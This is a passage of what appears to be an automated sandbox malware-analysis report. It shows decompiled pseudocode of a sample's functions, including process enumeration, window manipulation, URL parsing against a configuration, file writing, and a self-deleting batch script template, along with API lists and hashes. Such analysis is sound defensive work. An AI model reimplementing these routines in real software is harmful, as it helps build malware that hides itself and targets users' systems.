								L6:
								_t70 = _v16;
								if( *((intOrPtr*)(_v16 + _t47 * 4)) == _t65) {
									goto L20;
								}
								_t47 = _t47 + 1;
								if(_t47 < _v12) {
									continue;
								}
								goto L8;
							}
							goto L20;
						}
					}
					CloseHandle(_v20);
					if(_v24 != _t71) {
						continue;
					}
					break;
				}
				E00406E85(_v16);
				return _v5;
			}

0x00405f9f
0x00405fa1
0x00405fa5
0x00405fa8
0x00405fab
0x00405fae
0x00405fb4
0x00405fb7
0x00405fbd
0x00000000
0x00405fc3
0x00405fc3
0x00405fcd
0x00405fd7
0x00405fd7
0x004060e1
0x00405fe2
0x00405fea
0x004060d1
0x004060db
0x00000000
0x00405ffc
0x00405ffc
0x00406001
0x00406015
0x00406016
0x0040601b
0x00406020
0x00406038
0x0040603c
0x0040604d
0x0040604f
0x00406053
0x0040605e
0x00406099
0x004060a8
0x004060ab
0x004060ae
0x004060be
0x004060c0
0x004060c0
0x004060be
0x004060c5
0x004060c5
0x004060ca
0x004060ca
0x004060cf
0x004060cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00406003
0x00406003
0x00406003
0x00406009
0x00000000
0x00000000
0x0040600f
0x00406013
0x00000000
0x00000000
0x00000000
0x00406013
0x00000000
0x00406003
0x00405fea
0x004060ec
0x004060f1
0x00000000
0x00000000
0x00000000
0x004060f1
0x004060fa
0x00406106

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405FAE
Process32FirstW.KERNEL32(000001E6,?), ref: 00405FD7
OpenProcess.KERNEL32(00000400,00000000,?,?,?,74B5F560,00000000), ref: 00406032
CloseHandle.KERNEL32(00000000,00000000,?,?,74B5F560,00000000), ref: 0040604F
GetLengthSid.ADVAPI32(00000000,?,74B5F560,00000000), ref: 00406062
CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 004060CF
Process32NextW.KERNEL32(000001E6,0000022C), ref: 004060DB
CloseHandle.KERNEL32(000001E6,?,74B5F560,00000000), ref: 004060EC

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: 102aa5b3a5572a0c8206b2ad813836ddf9597e410a2eccb9fd90e54b22069b60
Instruction ID: 8b88a68ca66be50f030537a4abaf3047a9b79fb0861a7979160b4664bf09d63a
Opcode Fuzzy Hash: 102aa5b3a5572a0c8206b2ad813836ddf9597e410a2eccb9fd90e54b22069b60
Instruction Fuzzy Hash: 16417E70900219AFCF21DFA4CC849AEBBB5FF45304F1101BAE516B32A0DB3959A5CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA5F, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FA5F(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x0040fa68
0x0040fa6f
0x0040fa71
0x0040fa73
0x0040fa79
0x0040fa8c
0x0040fa8f
0x0040fa92
0x0040fa9f
0x0040faa7
0x0040fab2
0x0040fad1
0x0040fad5
0x0040fad8
0x0040faf6
0x0040faf6
0x0040faf9
0x0040fb19
0x00000000
0x0040fafb
0x0040fafb
0x0040fafb
0x0040fafc
0x0040fb14
0x0040fafe
0x0040fafe
0x0040fafe
0x0040faff
0x0040fb0c
0x00000000
0x0040fb01
0x0040fb01
0x0040fb02
0x00000000
0x00000000
0x0040fb02
0x0040faff
0x0040fafc
0x0040fada
0x0040fada
0x0040faf1
0x0040faf1
0x00000000
0x0040fadc
0x0040fadd
0x0040fadd
0x0040fade
0x00000000
0x0040fae0
0x0040fae1
0x0040fae1
0x0040fae2
0x0040fb04
0x0040fb04
0x00000000
0x0040fae4
0x0040fae4
0x0040fae4
0x0040fae7
0x0040fb0f
0x0040fb0f
0x0040fae9
0x0040fae9
0x0040fae9
0x0040faea
0x0040fb07
0x0040fb07
0x0040faec
0x0040faec
0x0040faed
0x0040fb1c
0x0040fb1c
0x0040fb1c
0x0040faed
0x0040faea
0x0040fae7
0x0040fae2
0x0040fade
0x0040fada
0x0040fab4
0x0040fab4
0x0040fab7
0x0040fabd
0x0040fac3
0x0040fac6
0x0040fac9
0x0040facc
0x0040facc
0x0040fb23
0x0040fb2b
0x0040fb3d
0x0040fb51
0x0040fb51
0x00000000
0x0040fb75
0x0040fb2b
0x0040fb7f

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040FA73
ReleaseMutex.KERNEL32(?), ref: 0040FA92
GetWindowRect.USER32 ref: 0040FA9F
IsRectEmpty.USER32(?), ref: 0040FB23
GetWindowLongW.USER32(?,000000F0), ref: 0040FB32
GetParent.USER32(?), ref: 0040FB48
MapWindowPoints.USER32 ref: 0040FB51
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040FB75

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 13b73a19ed11d4e8d08ecee732d92f6a49c880a7ec2914ba8645d3ce162c6c4d
Instruction ID: ff04ae67f8ebd9934e37cb14dbfdc182a8f09f2aa488094080bef6470f29fa1b
Opcode Fuzzy Hash: 13b73a19ed11d4e8d08ecee732d92f6a49c880a7ec2914ba8645d3ce162c6c4d
Instruction Fuzzy Hash: F641507190020ADFDB309FD8D9599BEBBB4FB44350F50017AE601F2AA4D774A944DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041B221, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041B221(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v60;
				char _v72;
				signed int _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v148;
				void* _v160;
				char _v168;
				char _v272;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t128;
				intOrPtr* _t129;
				char* _t130;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t152;
				void* _t154;
				char* _t156;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t167;
				void* _t172;
				intOrPtr _t174;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t187;
				signed int _t189;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t204;
				void* _t207;
				signed int _t210;
				void* _t214;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t224;
				char* _t227;
				intOrPtr _t228;
				char* _t233;
				char* _t236;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t244;
				void* _t247;

				_t217 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x423fe0);
				_t225 =  *0x423ffc;
				if( *0x423ffc == 0 ||  *0x423ff8 == 0) {
					_t240 = _a4;
				} else {
					_t240 = _a4;
					_t230 = 0;
					if(E0041A956(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
						_t210 = E004167D0();
						_v20 = _t210;
						if(_t210 != 0) {
							_t214 = E0041AA10(0, 4,  &_v20,  *0x423ff8);
							_push(_v20);
							if(_t214 == 0) {
								E00406E85();
							}
							E0041683B(_t225);
						}
						E00406E85( *0x423ff8);
						E00406E85( *0x423ffc);
						 *0x423ff8 = _t217;
						 *0x423ffc = _t217;
					}
				}
				LeaveCriticalSection(0x423fe0);
				_t128 =  *((intOrPtr*)(_t240 + 0x40));
				_t254 = _t128 - _t217;
				if(_t128 == _t217) {
					L38:
					if((_v16 & 0x00000001) == 0) {
						_t187 =  *((intOrPtr*)(_t240 + 0x44));
						_t272 = _t187 - _t217;
						if(_t187 != _t217 && E0041AC11(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
							_v16 = _v16 | 0x00000001;
						}
					}
					if( *(_t240 + 0x20) >= 0x21) {
						_t182 = 0x10;
						E00405ACA(_t182,  &_v72);
						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
						if(E00406EF6( &_v72, _t238, 0x21) == 0) {
							_t186 =  *((intOrPtr*)(_t238 + 0x21));
							if(_t186 == 0x3b || _t186 == 0) {
								_v16 = _v16 | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
					_v24 = _t217;
					if(_t129 == _t217 ||  *_t129 == _t217) {
						L52:
						_t130 =  *((intOrPtr*)(_t240 + 0x34));
						__eflags = _t130 - _t217;
						if(_t130 == _t217) {
							goto L60;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L60;
						}
						_t167 = 0x12;
						E00405B00(_t167,  &_v168);
						_t172 = E00407BF3( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
						_t247 = _t247 + 0xc;
						goto L55;
					} else {
						_t176 =  *((intOrPtr*)(_t240 + 0x30));
						if(_t176 == _t217 ||  *_t176 == _t217) {
							goto L52;
						} else {
							_t177 = 0x11;
							E00405B00(_t177,  &_v272);
							_push( *((intOrPtr*)(_a4 + 0x30)));
							_t172 = E00407BF3( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
							_t247 = _t247 + 0x10;
							L55:
							if(_t172 > _t217) {
								_t174 = E00408234(_v24, _t172 + _t172);
								if( *0x424000 != _t174) {
									_t64 =  &_v16;
									 *_t64 = _v16 | 0x00000020;
									__eflags =  *_t64;
									 *0x424000 = _t174;
								} else {
									E00406E85(_v24);
									_v24 = _t217;
								}
							}
							_t240 = _a4;
							L60:
							if(_v9 != 0xff) {
								__eflags = _v9 - 1;
								if(_v9 != 1) {
									L67:
									if((_v16 & 0x00000008) == 0) {
										L93:
										E00406E85(_v24);
										_t218 = _v16;
										if((_t218 & 0x00000001) == 0) {
											if(E0041AC79(_t230, _t240) != 0) {
												_t218 = _t218 | 0x00000002;
											}
											if((_t218 & 0x00000010) != 0 && E0041B033(_t240, _t230) != 0) {
												_t218 = _t218 | 0x00000004;
											}
										}
										return _t218;
									}
									_t136 =  *(_t240 + 0x28);
									_t219 = 0;
									if( *(_t240 + 0x28) != 0) {
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) == 0) {
											__eflags =  *(_t240 + 0x20);
											if( *(_t240 + 0x20) != 0) {
												L92:
												_v16 = _v16 & 0xfffffff7;
												goto L93;
											}
											_t233 =  &_v36;
											_t137 = 0xc;
											E00405ACA(_t137, _t233);
											_push(_t233);
											_push(9);
											L81:
											_pop(_t140);
											_v20 = E004072E3(_t140);
											L82:
											if(_v20 == 0) {
												goto L92;
											}
											E00405C85( &_v32);
											_t144 = E004070C5( *(_t240 + 0xc), 0,  *(_t240 + 8));
											_t235 = _t144;
											if(_t144 != 0) {
												_t230 = 0x3c;
												E00406F38( &_v160,  &_v160, 0, _t230);
												_v160 = _t230;
												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
													_t152 = 0xa;
													E00405B00(_t152,  &_v272);
													_t154 = 0xd;
													E00405B00(_t154,  &_v60);
													_t227 =  *(_a4 + 0x10);
													_t156 = 0x404284;
													_t230 =  ==  ? 0x404284 : _v24;
													_t244 =  ==  ? 0x404284 : _v32;
													if(_t227 == 0) {
														_t227 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t156 =  &_v60;
													}
													_push(_v20);
													_push(_t230);
													_push(_t244);
													_push(_t227);
													_push(_t156);
													_t161 = E0040ED2D(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
													_t240 = _a4;
													_t219 = _t161;
												}
												E00406E85(_t235);
											}
											E00406E85(_v32);
											E00406E85(_v20);
											if(_t219 != 0) {
												goto L93;
											} else {
												goto L92;
											}
										}
										_t230 = E004072E3(_t136,  *((intOrPtr*)(_t240 + 0x24)));
										_v20 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											goto L92;
										}
										_t163 = 0;
										__eflags =  *(_t240 + 0x28);
										if( *(_t240 + 0x28) <= 0) {
											goto L82;
										} else {
											goto L73;
										}
										do {
											L73:
											_t228 =  *((intOrPtr*)(_t163 + _t230));
											__eflags = _t228 - 0x26;
											if(_t228 != 0x26) {
												__eflags = _t228 - 0x2b;
												if(_t228 == 0x2b) {
													 *((char*)(_t163 + _t230)) = 0x20;
												}
											} else {
												 *((char*)(_t163 + _t230)) = 0xa;
											}
											_t163 = _t163 + 1;
											__eflags = _t163 -  *(_t240 + 0x28);
										} while (_t163 <  *(_t240 + 0x28));
										goto L82;
									}
									_t236 =  &_v36;
									_t164 = 0xb;
									E00405ACA(_t164, _t236);
									_push(_t236);
									_push(7);
									goto L81;
								}
								L66:
								_v16 = _v16 | 0x00000008;
								goto L67;
							}
							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
								if((_v16 & 0x00000020) == 0) {
									goto L67;
								}
							}
							goto L66;
						}
					}
				}
				_t189 = E0040C9F1( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
				_t225 = _v32;
				_v20 = _t189;
				if(E00407D17(_t189, _v32) == 0) {
					L37:
					E00406E85(_v20);
					_t217 = 0;
					goto L38;
				} else {
					_t239 = _v20;
					do {
						_t225 = _t239 + 1;
						if( *_t225 == 0) {
							goto L36;
						}
						_t194 =  *_t239;
						if(_t194 == 0x21) {
							L22:
							_t239 = _t225;
							L23:
							_t230 = 0;
							_t225 = _t239;
							if(E0041A956(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
								goto L36;
							}
							_t197 = _t224;
							if(_t197 == 0) {
								_v9 = 0;
								L35:
								if(_t224 != 2) {
									goto L37;
								}
								goto L36;
							}
							_t198 = _t197 - 1;
							if(_t198 == 0) {
								L30:
								_v9 = 1;
								goto L35;
							}
							_t199 = _t198 - 1;
							if(_t199 == 0) {
								_t230 = 0x3c;
								E00406F38( &_v96,  &_v96, 0, 0);
								_v80 =  &_v536;
								_v96 = 0;
								_v76 = 0x103;
								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
								__eflags = _t204 - 1;
								if(_t204 == 1) {
									__eflags = _v76;
									if(_v76 > 0) {
										E00405C3F( &_v536);
									}
								}
								goto L35;
							}
							_t207 = _t199 - 1;
							if(_t207 == 0 || _t207 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L30;
							} else {
								goto L35;
							}
						}
						if(_t194 == 0x2d) {
							goto L22;
						}
						if(_t194 == 0x40) {
							goto L22;
						}
						if(_t194 == 0x5e) {
							_t224 = 4;
							goto L22;
						} else {
							_t224 = 0;
							goto L23;
						}
						L36:
						_t239 = E00407D55(_t239, 1);
					} while (_t239 != 0);
					goto L37;
				}
			}

0x0041b232
0x0041b235
0x0041b238
0x0041b23c
0x0041b242
0x0041b24a
0x0041b2bb
0x0041b254
0x0041b254
0x0041b25a
0x0041b266
0x0041b268
0x0041b26d
0x0041b272
0x0041b280
0x0041b285
0x0041b28a
0x0041b28c
0x0041b291
0x0041b292
0x0041b292
0x0041b29d
0x0041b2a8
0x0041b2ad
0x0041b2b3
0x0041b2b3
0x0041b266
0x0041b2bf
0x0041b2c5
0x0041b2c8
0x0041b2ca
0x0041b3cf
0x0041b3d3
0x0041b3d5
0x0041b3d8
0x0041b3da
0x0041b3ef
0x0041b3ef
0x0041b3da
0x0041b3f7
0x0041b3fe
0x0041b3ff
0x0041b404
0x0041b415
0x0041b417
0x0041b41c
0x0041b422
0x0041b422
0x0041b41c
0x0041b415
0x0041b426
0x0041b429
0x0041b42e
0x0041b469
0x0041b469
0x0041b46c
0x0041b46e
0x00000000
0x00000000
0x0041b470
0x0041b473
0x00000000
0x00000000
0x0041b47d
0x0041b47e
0x0041b490
0x0041b495
0x00000000
0x0041b435
0x0041b435
0x0041b43a
0x00000000
0x0041b441
0x0041b449
0x0041b44a
0x0041b452
0x0041b45f
0x0041b464
0x0041b498
0x0041b49a
0x0041b4a2
0x0041b4ad
0x0041b4bc
0x0041b4bc
0x0041b4bc
0x0041b4c0
0x0041b4af
0x0041b4b2
0x0041b4b7
0x0041b4b7
0x0041b4ad
0x0041b4c5
0x0041b4c8
0x0041b4cc
0x0041b4e1
0x0041b4e5
0x0041b4eb
0x0041b4ef
0x0041b662
0x0041b665
0x0041b66a
0x0041b670
0x0041b67a
0x0041b67c
0x0041b67c
0x0041b682
0x0041b68f
0x0041b68f
0x0041b682
0x0041b698
0x0041b698
0x0041b4f5
0x0041b4f8
0x0041b4fc
0x0041b510
0x0041b514
0x0041b551
0x0041b555
0x0041b65e
0x0041b65e
0x00000000
0x0041b65e
0x0041b55d
0x0041b560
0x0041b561
0x0041b568
0x0041b569
0x0041b56b
0x0041b56b
0x0041b571
0x0041b574
0x0041b578
0x00000000
0x00000000
0x0041b581
0x0041b58e
0x0041b593
0x0041b597
0x0041b59f
0x0041b5aa
0x0041b5bb
0x0041b5cd
0x0041b5d7
0x0041b5d8
0x0041b5e2
0x0041b5e3
0x0041b5f1
0x0041b5f6
0x0041b5fb
0x0041b600
0x0041b605
0x0041b607
0x0041b607
0x0041b610
0x0041b612
0x0041b612
0x0041b615
0x0041b618
0x0041b619
0x0041b61a
0x0041b61b
0x0041b637
0x0041b63c
0x0041b642
0x0041b642
0x0041b645
0x0041b645
0x0041b64d
0x0041b655
0x0041b65c
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b65c
0x0041b51e
0x0041b520
0x0041b523
0x0041b525
0x00000000
0x00000000
0x0041b52b
0x0041b52d
0x0041b530
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b532
0x0041b532
0x0041b532
0x0041b535
0x0041b538
0x0041b540
0x0041b543
0x0041b545
0x0041b545
0x0041b53a
0x0041b53a
0x0041b53a
0x0041b549
0x0041b54a
0x0041b54a
0x00000000
0x0041b54f
0x0041b500
0x0041b503
0x0041b504
0x0041b50b
0x0041b50c
0x00000000
0x0041b50c
0x0041b4e7
0x0041b4e7
0x00000000
0x0041b4e7
0x0041b4d2
0x0041b4dd
0x00000000
0x00000000
0x0041b4df
0x00000000
0x0041b4d2
0x0041b43a
0x0041b42e
0x0041b2de
0x0041b2e3
0x0041b2e6
0x0041b2f0
0x0041b3c5
0x0041b3c8
0x0041b3cd
0x00000000
0x0041b2f6
0x0041b2f6
0x0041b2f9
0x0041b2f9
0x0041b2ff
0x00000000
0x00000000
0x0041b305
0x0041b309
0x0041b329
0x0041b329
0x0041b32b
0x0041b32e
0x0041b333
0x0041b33c
0x00000000
0x00000000
0x0041b341
0x0041b344
0x0041b3a9
0x0041b3ad
0x0041b3b0
0x00000000
0x00000000
0x00000000
0x0041b3b0
0x0041b346
0x0041b347
0x0041b356
0x0041b356
0x00000000
0x0041b356
0x0041b349
0x0041b34a
0x0041b35e
0x0041b366
0x0041b371
0x0041b37d
0x0041b383
0x0041b38a
0x0041b390
0x0041b393
0x0041b395
0x0041b399
0x0041b3a2
0x0041b3a2
0x0041b399
0x00000000
0x0041b393
0x0041b34c
0x0041b34d
0x0041b352
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b34d
0x0041b30d
0x00000000
0x0041b323
0x0041b311
0x00000000
0x0041b31f
0x0041b315
0x0041b31b
0x00000000
0x0041b317
0x0041b317
0x00000000
0x0041b317
0x0041b3b2
0x0041b3bb
0x0041b3bd
0x00000000
0x0041b2f9

APIs

EnterCriticalSection.KERNEL32(00423FE0,-00423E5C,00000000,00423E40), ref: 0041B23C
LeaveCriticalSection.KERNEL32(00423FE0), ref: 0041B2BF
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041B38A
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041B5C4

Part of subcall function 004167D0: CreateMutexW.KERNEL32(004239A0,00000000,00423EF8,?,00000001,?,0040F02D), ref: 004167F8

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Strings

, xrefs: 0041B4D9
?B, xrefs: 0041B22D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
String ID: $?B
API String ID: 4018265435-754174147
Opcode ID: dd2f76f3c2787d40fc5c101cbb5e1fb0dde249eb300f5129a824b73737d03b4c
Instruction ID: 736aaa3c121213802786d1d3134a1439edee6384c1233d8a51108f0df5eb9323
Opcode Fuzzy Hash: dd2f76f3c2787d40fc5c101cbb5e1fb0dde249eb300f5129a824b73737d03b4c
Instruction Fuzzy Hash: 07D1F330E00209AEDF209BA1CC45BEF7BB6EF40304F14856BE855A7291C77CA9D1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00408945, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00408945(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E0040C201(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E00407C49( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0040C1E0( &_v592);
					goto L7;
				}
				_t35 = E0040C035( &_v592, _a4, _t31);
				E00406E85(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E00407B78( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E00406F38( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E0040874C( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x00408961
0x00408a53
0x00000000
0x00408a53
0x00408975
0x00408981
0x00408999
0x00408a47
0x00408a4e
0x00000000
0x00408a4e
0x004089ab
0x004089b5
0x004089bd
0x00000000
0x00000000
0x004089c3
0x004089ca
0x004089e6
0x00000000
0x00408a07
0x00408a09
0x00408a11
0x00408a19
0x00408a31
0x00408a34
0x00000000
0x00408a42

APIs

Part of subcall function 0040C201: GetTempPathW.KERNEL32(000000F6,?), ref: 0040C218

CharToOemW.USER32 ref: 00408975

Part of subcall function 0040C035: CreateFileW.KERNEL32(0040895F,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C04F
Part of subcall function 0040C035: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C072
Part of subcall function 0040C035: CloseHandle.KERNEL32(00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C07F

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 004089F9

Strings

ComSpec, xrefs: 004089F4
/c "%s", xrefs: 004089CB
bat, xrefs: 00408955
@echo off%sdel /F "%s", xrefs: 00408988

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 067c0708d630c08d41bc8b9ba89980e0689973a1f0ae86990dba8657dcb5d2be
Instruction ID: 33e426ad9d2ac409e3d0ffb5696a55b6e6f15052de43973c855df06adbfe6d66
Opcode Fuzzy Hash: 067c0708d630c08d41bc8b9ba89980e0689973a1f0ae86990dba8657dcb5d2be
Instruction Fuzzy Hash: 5A21857190110CAADF10DBA4CD46FEE77ACDB44314F20557BB948F20D1DA789A858F68

Uniqueness

Uniqueness Score: -1.00%

Function 00414678, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414678(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E00405B00(_t18,  &_v32);
				if(E0040C70A(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E00405ACA(_t26,  &_v360);
				_t9 =  &_v8; // 0x414660
				if(WriteFile( *_t9,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E0040C1E0( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E004079C2(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x00414685
0x00414688
0x00414689
0x0041468c
